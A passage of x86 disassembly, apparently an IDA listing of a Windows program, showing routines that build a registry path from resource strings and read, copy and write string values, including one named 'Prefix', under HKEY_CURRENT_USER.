lea esp, [ebp-0EA4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_407EA2: ; CODE XREF: sub_407820+2B�j
; sub_407820+48�j ...
lea esp, [ebp-0EA4h]
or eax, 0FFFFFFFFh
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_407820 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407EC0 proc near ; CODE XREF: sub_405C90+152�p
; sub_406720+40�p
psz = byte ptr -438h
Data = byte ptr -338h
String = byte ptr -238h
var_138 = byte ptr -138h
bstrString = dword ptr -38h
lpMem = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_E = byte ptr -0Eh
Type = dword ptr -0Ch
cbData = dword ptr -8
hKey = dword ptr -4
push ebp
mov ebp, esp
sub esp, 438h
push ebx
push esi
push edi
mov edi, ecx
lea ecx, [ebp+psz]
push 200h ; cchBufferMax
mov eax, [edi+1Ch]
push ecx ; lpBuffer
xor ebx, ebx
push 71h ; uID
push eax ; hInstance
mov [ebp+Type], edi
mov [ebp+bstrString], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_30], ebx
mov [ebp+var_2C], bl
mov [ebp+var_E], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov esi, eax
push edx ; bstrString
call ds:SysFreeString
cmp esi, ebx
jz short loc_407F66
lea eax, [ebp+psz]
test eax, eax
jnz short loc_407F20
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_407F69
; ---------------------------------------------------------------------------
loc_407F20: ; CODE XREF: sub_407EC0+52�j
lea ecx, [ebp+psz]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea edx, [ebp+psz]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
mov [edi], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, edi
mov edi, [ebp+Type]
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_407F69
; ---------------------------------------------------------------------------
loc_407F66: ; CODE XREF: sub_407EC0+48�j
mov [ebp+bstrString], ebx
loc_407F69: ; CODE XREF: sub_407EC0+5E�j
; sub_407EC0+A4�j
mov eax, offset MultiByteStr ; "\\"
test eax, eax
jnz short loc_407F76
xor esi, esi
jmp short loc_407FA2
; ---------------------------------------------------------------------------
loc_407F76: ; CODE XREF: sub_407EC0+B0�j
push offset MultiByteStr ; "\\"
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push esi ; cchWideChar
push offset MultiByteStr ; "\\"
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_407FA2: ; CODE XREF: sub_407EC0+B4�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+bstrString]
call sub_403920
mov ecx, [edi+1Ch]
push 7Ah ; bstrString
push ecx ; hInstance
lea ecx, [ebp+bstrString]
call sub_40A840
lea ecx, [ebp+bstrString]
call sub_40A2D0
push eax ; phkResult
lea ecx, [edi+20h] ; int
call sub_408FC0
test al, al
jnz short loc_40800A
mov ecx, edi
call sub_4081B0
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_407FF0
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_407FF0: ; CODE XREF: sub_407EC0+122�j
mov edx, [ebp+bstrString]
push edx ; bstrString
call ds:SysFreeString
or eax, 0FFFFFFFFh
lea esp, [ebp-444h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40800A: ; CODE XREF: sub_407EC0+114�j
lea eax, [ebp+hKey]
lea ecx, [ebp+bstrString]
push eax ; phkResult
push 20019h ; samDesired
push ebx ; ulOptions
call sub_40A2D0
mov edi, ds:RegOpenKeyExA
push eax ; lpSubKey
push 80000001h ; hKey
call edi ; RegOpenKeyExA
test eax, eax
jnz loc_408108
mov eax, lpValueName
mov esi, ds:RegQueryValueExA
lea ecx, [ebp+cbData]
lea edx, [ebp+Type]
push ecx ; lpcbData
mov ecx, [ebp+hKey]
push ebx ; lpData
push edx ; lpType
push ebx ; lpReserved
push eax ; lpValueName
push ecx ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_408095
lea edx, [ebp+cbData]
lea eax, [ebp+Data]
push edx ; lpcbData
mov edx, lpValueName
lea ecx, [ebp+Type]
push eax ; lpData
mov eax, [ebp+hKey]
push ecx ; lpType
push ebx ; lpReserved
push edx ; lpValueName
push eax ; hKey
call esi ; RegQueryValueExA
mov ecx, [ebp+cbData]
lea edx, [ebp+Data]
push ecx
lea eax, [ebp+String]
push edx
push eax
call sub_40B070
mov ecx, [ebp+cbData]
add esp, 0Ch
mov [ebp+ecx+String], bl
jmp short loc_40809B
; ---------------------------------------------------------------------------
loc_408095: ; CODE XREF: sub_407EC0+190�j
mov [ebp+String], bl
loc_40809B: ; CODE XREF: sub_407EC0+1D3�j
mov ecx, off_40F27C
lea edx, [ebp+cbData]
push edx ; lpcbData
mov edx, [ebp+hKey]
lea eax, [ebp+Type]
push ebx ; lpData
push eax ; lpType
push ebx ; lpReserved
push ecx ; lpValueName
push edx ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_4080F8
lea eax, [ebp+cbData]
lea ecx, [ebp+Data]
push eax ; lpcbData
mov eax, off_40F27C
lea edx, [ebp+Type]
push ecx ; lpData
mov ecx, [ebp+hKey]
push edx ; lpType
push ebx ; lpReserved
push eax ; lpValueName
push ecx ; hKey
call esi ; RegQueryValueExA
mov edx, [ebp+cbData]
lea eax, [ebp+Data]
push edx
lea ecx, [ebp+var_138]
push eax
push ecx
call sub_40B070
mov edx, [ebp+cbData]
add esp, 0Ch
mov [ebp+edx+var_138], bl
jmp short loc_4080FE
; ---------------------------------------------------------------------------
loc_4080F8: ; CODE XREF: sub_407EC0+1F4�j
mov [ebp+var_138], bl
loc_4080FE: ; CODE XREF: sub_407EC0+236�j
mov eax, [ebp+hKey]
push eax ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_408108: ; CODE XREF: sub_407EC0+16C�j
mov edx, lpSubKey
lea ecx, [ebp+hKey]
push ecx ; phkResult
push 0F003Fh ; samDesired
push ebx ; ulOptions
push edx ; lpSubKey
push 80000001h ; hKey
call edi ; RegOpenKeyExA
test eax, eax
jnz short loc_40817B
mov edi, ds:lstrlenA
lea eax, [ebp+String]
push eax ; lpString
call edi ; lstrlenA
mov edx, lpValueName
mov esi, ds:RegSetValueExA
lea ecx, [ebp+String]
push eax ; cbData
mov eax, [ebp+hKey]
push ecx ; lpData
push 1 ; dwType
push ebx ; Reserved
push edx ; lpValueName
push eax ; hKey
call esi ; RegSetValueExA
lea ecx, [ebp+var_138]
push ecx ; lpString
call edi ; lstrlenA
mov ecx, [ebp+hKey]
lea edx, [ebp+var_138]
push eax ; cbData
mov eax, off_40F27C
push edx ; lpData
push 1 ; dwType
push ebx ; Reserved
push eax ; lpValueName
push ecx ; hKey
call esi ; RegSetValueExA
mov edx, [ebp+hKey]
push edx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_40817B: ; CODE XREF: sub_407EC0+262�j
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_40818E
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_40818E: ; CODE XREF: sub_407EC0+2C0�j
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
lea esp, [ebp-444h]
xor eax, eax
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_407EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081B0 proc near ; CODE XREF: sub_407EC0+118�p
String = byte ptr -54Ch
Data = byte ptr -34Ch
var_24C = byte ptr -24Ch
var_14C = byte ptr -14Ch
dwDisposition = dword ptr -4Ch
bstrString = dword ptr -48h
lpMem = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_1E = byte ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
lpString = dword ptr -10h
Type = dword ptr -0Ch
cbData = dword ptr -8
hKey = dword ptr -4
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
lea eax, [ebp+hKey]
mov edi, ecx
push eax ; phkResult
mov ecx, lpSubKey
xor ebx, ebx
push 20019h ; samDesired
push ebx ; ulOptions
push ecx ; lpSubKey
push 80000001h ; hKey
mov [ebp+var_14], edi
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz loc_4082C1
mov ecx, lpValueName
mov esi, ds:RegQueryValueExA
lea edx, [ebp+cbData]
lea eax, [ebp+Type]
push edx ; lpcbData
mov edx, [ebp+hKey]
push ebx ; lpData
push eax ; lpType
push ebx ; lpReserved
push ecx ; lpValueName
push edx ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_40824A
lea eax, [ebp+cbData]
lea ecx, [ebp+Data]
push eax ; lpcbData
mov eax, lpValueName
lea edx, [ebp+Type]
push ecx ; lpData
mov ecx, [ebp+hKey]
push edx ; lpType
push ebx ; lpReserved
push eax ; lpValueName
push ecx ; hKey
call esi ; RegQueryValueExA
mov edx, [ebp+cbData]
lea eax, [ebp+Data]
push edx
lea ecx, [ebp+var_24C]
push eax
push ecx
call sub_40B070
mov edx, [ebp+cbData]
add esp, 0Ch
mov [ebp+edx+var_24C], bl
jmp short loc_408251
; ---------------------------------------------------------------------------
loc_40824A: ; CODE XREF: sub_4081B0+56�j
mov [ebp+var_24C], 0
loc_408251: ; CODE XREF: sub_4081B0+98�j
mov edx, off_40F27C
lea eax, [ebp+cbData]
push eax ; lpcbData
mov eax, [ebp+hKey]
lea ecx, [ebp+Type]
push ebx ; lpData
push ecx ; lpType
push ebx ; lpReserved
push edx ; lpValueName
push eax ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_4082B0
lea ecx, [ebp+cbData]
lea edx, [ebp+Data]
push ecx ; lpcbData
mov ecx, off_40F27C
lea eax, [ebp+Type]
push edx ; lpData
mov edx, [ebp+hKey]
push eax ; lpType
push ebx ; lpReserved
push ecx ; lpValueName
push edx ; hKey
call esi ; RegQueryValueExA
mov eax, [ebp+cbData]
lea ecx, [ebp+Data]
push eax
lea edx, [ebp+var_14C]
push ecx
push edx
call sub_40B070
mov eax, [ebp+cbData]
add esp, 0Ch
mov [ebp+eax+var_14C], 0
jmp short loc_4082B7
; ---------------------------------------------------------------------------
loc_4082B0: ; CODE XREF: sub_4081B0+BA�j
mov [ebp+var_14C], 0
loc_4082B7: ; CODE XREF: sub_4081B0+FE�j
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_4082C1: ; CODE XREF: sub_4081B0+31�j
mov eax, [edi+1Ch]
lea edx, [ebp+String]
push 200h ; cchBufferMax
push edx ; lpBuffer
push 71h ; uID
push eax ; hInstance
mov [ebp+bstrString], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_40], ebx
mov [ebp+var_3C], 0
mov [ebp+var_1E], 0
call ds:LoadStringA ; LoadStringA
mov esi, eax
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
mov edi, ds:MultiByteToWideChar
cmp esi, ebx
jz short loc_40835D
lea ecx, [ebp+String]
test ecx, ecx
jnz short loc_408318
xor eax, eax
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_408360
; ---------------------------------------------------------------------------
loc_408318: ; CODE XREF: sub_4081B0+158�j
lea edx, [ebp+String]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
lea eax, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call edi ; MultiByteToWideChar
mov eax, ebx
xor ebx, ebx
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_408360
; ---------------------------------------------------------------------------
loc_40835D: ; CODE XREF: sub_4081B0+14E�j
mov [ebp+bstrString], ebx
loc_408360: ; CODE XREF: sub_4081B0+166�j
; sub_4081B0+1AB�j
mov ecx, offset MultiByteStr ; "\\"
test ecx, ecx
jnz short loc_40836E
mov [ebp+lpString], ebx
jmp short loc_4083A4
; ---------------------------------------------------------------------------
loc_40836E: ; CODE XREF: sub_4081B0+1B7�j
push offset MultiByteStr ; "\\"
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push offset MultiByteStr ; "\\"
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call edi ; MultiByteToWideChar
mov [ebp+lpString], ebx
xor ebx, ebx
loc_4083A4: ; CODE XREF: sub_4081B0+1BC�j
mov edx, [ebp+lpString]
push edx ; lpString
call ds:lstrlenW ; lstrlenW
mov edi, eax
mov eax, [ebp+bstrString]
cmp eax, ebx
mov [ebp+var_1C], edi
jnz short loc_4083BE
xor esi, esi
jmp short loc_4083C7
; ---------------------------------------------------------------------------
loc_4083BE: ; CODE XREF: sub_4081B0+208�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_4083C7: ; CODE XREF: sub_4081B0+20C�j
lea eax, [esi+edi]
push eax ; ui
push ebx ; strIn
mov [ebp+var_18], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_408422
lea eax, [esi+esi]
mov esi, [ebp+bstrString]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_1C]
mov esi, [ebp+lpString]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_18]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov word ptr [ebx+eax*2], 0
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
mov [ebp+bstrString], ebx
loc_408422: ; CODE XREF: sub_4081B0+229�j
mov edx, [ebp+var_14]
push 7Ah ; bstrString
lea ecx, [ebp+bstrString]
mov eax, [edx+1Ch]
push eax ; hInstance
call sub_40A840
lea ecx, [ebp+dwDisposition]
lea edx, [ebp+hKey]
push ecx ; lpdwDisposition
push edx ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
lea ecx, [ebp+bstrString]
call sub_40A2D0
push eax ; lpSubKey
push 80000001h ; hKey
call ds:RegCreateKeyExA ; RegCreateKeyExA
test eax, eax
jnz short loc_4084B9
mov edi, ds:lstrlenA
lea eax, [ebp+var_24C]
push eax ; lpString
call edi ; lstrlenA
mov edx, lpValueName
mov esi, ds:RegSetValueExA
lea ecx, [ebp+var_24C]
push eax ; cbData
mov eax, [ebp+hKey]
push ecx ; lpData
push 1 ; dwType
push 0 ; Reserved
push edx ; lpValueName
push eax ; hKey
call esi ; RegSetValueExA
lea ecx, [ebp+var_14C]
push ecx ; lpString
call edi ; lstrlenA
mov ecx, [ebp+hKey]
lea edx, [ebp+var_14C]
push eax ; cbData
mov eax, off_40F27C
push edx ; lpData
push 1 ; dwType
push 0 ; Reserved
push eax ; lpValueName
push ecx ; hKey
call esi ; RegSetValueExA
mov edx, [ebp+hKey]
push edx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_4084B9: ; CODE XREF: sub_4081B0+2AE�j
mov eax, [ebp+lpMem]
test eax, eax
jz short loc_4084D0
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], 0
loc_4084D0: ; CODE XREF: sub_4081B0+30E�j
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
lea esp, [ebp-558h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4081B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_4084F0(BYTE *lpData)
sub_4084F0 proc near ; CODE XREF: sub_406E00+3A�p
psz = byte ptr -244h
dwDisposition = dword ptr -44h
bstrString = dword ptr -40h
lpMem = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_16 = byte ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
hKey = dword ptr -8
lpString = dword ptr -4
lpData = dword ptr 8
push ebp
mov ebp, esp
sub esp, 244h
mov eax, [ecx+1Ch]
push ebx
push esi
mov [ebp+var_10], ecx
push edi
lea ecx, [ebp+psz]
push 200h ; cchBufferMax
push ecx ; lpBuffer
xor ebx, ebx
push 71h ; uID
push eax ; hInstance
mov [ebp+bstrString], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], bl
mov [ebp+var_16], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov esi, eax
push edx ; bstrString
call ds:SysFreeString
mov edi, ds:lstrlenA
cmp esi, ebx
jz short loc_408599
lea eax, [ebp+psz]
test eax, eax
jnz short loc_408554
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_40859C
; ---------------------------------------------------------------------------
loc_408554: ; CODE XREF: sub_4084F0+56�j
lea ecx, [ebp+psz]
push ecx ; lpString
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
lea edx, [ebp+psz]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, ebx
xor ebx, ebx
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_40859C
; ---------------------------------------------------------------------------
loc_408599: ; CODE XREF: sub_4084F0+4C�j
mov [ebp+bstrString], ebx
loc_40859C: ; CODE XREF: sub_4084F0+62�j
; sub_4084F0+A7�j
mov eax, offset MultiByteStr ; "\\"
test eax, eax
jnz short loc_4085AA
mov [ebp+lpString], ebx
jmp short loc_4085E0
; ---------------------------------------------------------------------------
loc_4085AA: ; CODE XREF: sub_4084F0+B3�j
push offset MultiByteStr ; "\\"
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push offset MultiByteStr ; "\\"
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+lpString], ebx
xor ebx, ebx
loc_4085E0: ; CODE XREF: sub_4084F0+B8�j
mov ecx, [ebp+lpString]
push ecx ; lpString
call ds:lstrlenW ; lstrlenW
mov edi, eax
mov eax, [ebp+bstrString]
cmp eax, ebx
mov [ebp+var_14], edi
jnz short loc_4085FA
xor esi, esi
jmp short loc_408603
; ---------------------------------------------------------------------------
loc_4085FA: ; CODE XREF: sub_4084F0+104�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_408603: ; CODE XREF: sub_4084F0+108�j
lea eax, [esi+edi]
push eax ; ui
push ebx ; strIn
mov [ebp+var_C], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_40865E
lea eax, [esi+esi]
mov esi, [ebp+bstrString]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_14]
mov esi, [ebp+lpString]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_C]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov word ptr [ebx+eax*2], 0
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
mov [ebp+bstrString], ebx
loc_40865E: ; CODE XREF: sub_4084F0+125�j
mov edx, [ebp+var_10]
push 7Ah ; bstrString
lea ecx, [ebp+bstrString]
mov eax, [edx+1Ch]
push eax ; hInstance
call sub_40A840
lea ecx, [ebp+dwDisposition]
lea edx, [ebp+hKey]
push ecx ; lpdwDisposition
push edx ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
lea ecx, [ebp+bstrString]
call sub_40A2D0
push eax ; lpSubKey
push 80000001h ; hKey
call ds:RegCreateKeyExA ; RegCreateKeyExA
test eax, eax
jnz short loc_4086BF
mov eax, [ebp+lpData]
mov ecx, [ebp+hKey]
push 0Ah ; cbData
push eax ; lpData
push 1 ; dwType
push 0 ; Reserved
push offset aPrefix ; "Prefix"
push ecx ; hKey
call ds:RegSetValueExA ; RegSetValueExA
mov edx, [ebp+hKey]
push edx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_4086BF: ; CODE XREF: sub_4084F0+1AA�j
mov eax, [ebp+lpMem]
test eax, eax
jz short loc_4086D6
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], 0
loc_4086D6: ; CODE XREF: sub_4084F0+1D4�j
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
lea esp, [ebp-250h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_4084F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4086F0 proc near ; CODE XREF: sub_405C90+7C2�p
psz = byte ptr -454h
Data = byte ptr -254h
var_154 = byte ptr -154h
bstrString = dword ptr -54h
lpMem = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_2A = byte ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Type = dword ptr -20h
String2 = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_10 = dword ptr -10h
hKey = dword ptr -0Ch
lpString = dword ptr -8
cbData = dword ptr -4
push ebp
mov ebp, esp
sub esp, 454h
mov eax, [ecx+1Ch]
push ebx
push esi
mov [ebp+var_10], ecx
push edi
lea ecx, [ebp+psz]
push 200h ; cchBufferMax
push ecx ; lpBuffer
xor ebx, ebx
push 71h ; uID
push eax ; hInstance
mov [ebp+bstrString], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_4C], ebx
mov [ebp+var_48], bl
mov [ebp+var_2A], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov esi, eax
push edx ; bstrString
call ds:SysFreeString
mov edi, ds:lstrlenA
cmp esi, ebx
jz short loc_408799
lea eax, [ebp+psz]
test eax, eax
jnz short loc_408754
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_40879C
; ---------------------------------------------------------------------------
loc_408754: ; CODE XREF: sub_4086F0+56�j
lea ecx, [ebp+psz]
push ecx ; lpString
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
lea edx, [ebp+psz]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, ebx
xor ebx, ebx
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_40879C
; ---------------------------------------------------------------------------
loc_408799: ; CODE XREF: sub_4086F0+4C�j
mov [ebp+bstrString], ebx
loc_40879C: ; CODE XREF: sub_4086F0+62�j
; sub_4086F0+A7�j
mov eax, offset MultiByteStr ; "\\"
test eax, eax
jnz short loc_4087AA
mov [ebp+lpString], ebx
jmp short loc_4087E0
; ---------------------------------------------------------------------------
loc_4087AA: ; CODE XREF: sub_4086F0+B3�j
push offset MultiByteStr ; "\\"
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push offset MultiByteStr ; "\\"
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+lpString], ebx
xor ebx, ebx
loc_4087E0: ; CODE XREF: sub_4086F0+B8�j
mov ecx, [ebp+lpString]
push ecx ; lpString
call ds:lstrlenW ; lstrlenW
mov edi, eax
mov eax, [ebp+bstrString]
cmp eax, ebx
mov [ebp+var_24], edi
jnz short loc_4087FA
xor esi, esi
jmp short loc_408803
; ---------------------------------------------------------------------------
loc_4087FA: ; CODE XREF: sub_4086F0+104�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_408803: ; CODE XREF: sub_4086F0+108�j
lea eax, [esi+edi]
push eax ; ui
push ebx ; strIn
mov [ebp+var_28], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_40885E
lea eax, [esi+esi]
mov esi, [ebp+bstrString]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_24]
mov esi, [ebp+lpString]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_28]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov word ptr [ebx+eax*2], 0
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
mov [ebp+bstrString], ebx
loc_40885E: ; CODE XREF: sub_4086F0+125�j
mov edx, [ebp+var_10]
push 7Ah ; bstrString
lea ecx, [ebp+bstrString]
mov eax, [edx+1Ch]
push eax ; hInstance
call sub_40A840
lea ecx, [ebp+hKey]
push ecx ; phkResult
push 20019h ; samDesired
push 0 ; ulOptions
lea ecx, [ebp+bstrString]
call sub_40A2D0
push eax ; lpSubKey
push 80000001h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz short loc_408906
mov ecx, [ebp+hKey]
lea edx, [ebp+cbData]
mov esi, ds:RegQueryValueExA
push edx ; lpcbData
push eax ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push 0 ; lpReserved
push offset aPrefix ; "Prefix"
push ecx ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_4088F5
lea edx, [ebp+cbData]
lea eax, [ebp+Data]
push edx ; lpcbData
mov edx, [ebp+hKey]
lea ecx, [ebp+Type]
push eax ; lpData
push ecx ; lpType
push 0 ; lpReserved
push offset aPrefix ; "Prefix"
push edx ; hKey
call esi ; RegQueryValueExA
mov eax, [ebp+cbData]
lea ecx, [ebp+Data]
push eax
lea edx, [ebp+var_154]
push ecx
push edx
call sub_40B070
mov eax, [ebp+cbData]
add esp, 0Ch
mov [ebp+eax+var_154], 0
jmp short loc_4088FC
; ---------------------------------------------------------------------------
loc_4088F5: ; CODE XREF: sub_4086F0+1C0�j
mov [ebp+var_154], 0
loc_4088FC: ; CODE XREF: sub_4086F0+203�j
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_408906: ; CODE XREF: sub_4086F0+1A0�j
lea edi, [ebp+var_154]
or ecx, 0FFFFFFFFh
xor eax, eax
xor edx, edx
repne scasb
mov dword ptr [ebp+String2], edx
not ecx
mov [ebp+var_18], edx
dec ecx
mov [ebp+var_14], dx
jz short loc_408939
lea eax, [ebp+var_154]
push 0Ah
lea ecx, [ebp+String2]
push eax
push ecx
call sub_40B070
add esp, 0Ch
loc_408939: ; CODE XREF: sub_4086F0+232�j
mov ecx, dword_40FBC8
lea edx, [ebp+String2]
push edx ; lpString2
call sub_409C20
mov eax, [ebp+lpMem]
test eax, eax
jz short loc_40895F
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], 0
loc_40895F: ; CODE XREF: sub_4086F0+25D�j
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
lea esp, [ebp-460h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4086F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408980 proc near ; CODE XREF: sub_405C90+15C�p
; sub_405C90+1D5�p
psz = byte ptr -448h
Data = byte ptr -248h
var_148 = byte ptr -148h
bstrString = dword ptr -48h
lpMem = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_1E = byte ptr -1Eh
Type = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
hKey = dword ptr -0Ch
lpString = dword ptr -8
